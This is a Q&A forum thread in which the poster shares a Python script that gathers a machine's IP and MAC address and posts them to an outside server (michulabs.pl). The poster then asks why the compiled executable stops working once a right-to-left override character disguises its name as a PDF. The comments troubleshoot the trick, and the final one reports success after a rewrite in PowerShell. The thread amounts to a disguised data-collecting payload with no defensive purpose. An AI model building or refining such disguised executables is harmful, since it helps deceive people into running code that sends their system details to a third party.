# RTLO in filename in windows

Tags: python, filenames

I wrote simple script in python

```
#!/usr/bin/python
from uuid import getnode as get_mac
import socket
import requests
import datetime
#import tkMessageBox as messagebox
#import Tkinter as tk


def main():
    print('start')
    i = datetime.datetime.now()
    headers = {"Content-Type": "text/html; charset=UTF-8"}
    r = requests.post("http://michulabs.pl", data={'name' : 'CI17nH', 'ip' : getIp(), 'mac' : getMac(), 'source' : 'so', 'join_date' : i})
    print(r.status_code, r.reason)
    print(r.text)  # TEXT/HTML
    print(r.status_code, r.reason)  # HTTP

"""
method to read ip from computer
it will be saved in database
"""
def getIp():
    ip = socket.gethostbyname(socket.gethostname())
    print 'ip: ' + str(ip)
    return ip

"""
method to read mac from computer
it will be saved in database
"""
def getMac():
  mac = get_mac()
  print 'mac: ' + str(mac)
  return mac

if __name__ == "__main__":
  main()
```

Then by py2exe generated .exe file and tried to use RTLO character in filename which made script called moc.pdf instead of pdf.com. Actually it works good with pdf.com but it doesn't after using RTLO character. Did Windows blocked that trick in filenames, or am I doing something wrong?
PS Windows didn't block that trick because it does work with other file.

Comment: So you have a working python script that you can convert to exe is you use *normal characters* for the executable file name. But if you pass a filename containing RTLO characters (as input or output?) you end with a reversed filename. Right?

Comment: Yes, I have reversed filename but when I try to run, it fails. Normally it works with any name without RTLO character.

Comment: What happens if you create the executable with a normat name and then rename it (or copy it) with  a name containing RTLO characters?

Comment: The filename changes but then application doesn't work. Before adding RTLO it works

Comment: Ok, so when you RTLO rename a working executable file name, it no longer works. Right?

Comment: Yes, after adding RTLO application no longer works

Comment: Probably RTLO works only with .NET platform (not sure) but when I rewrite it to powershell then it worked. Haven't solved it with Python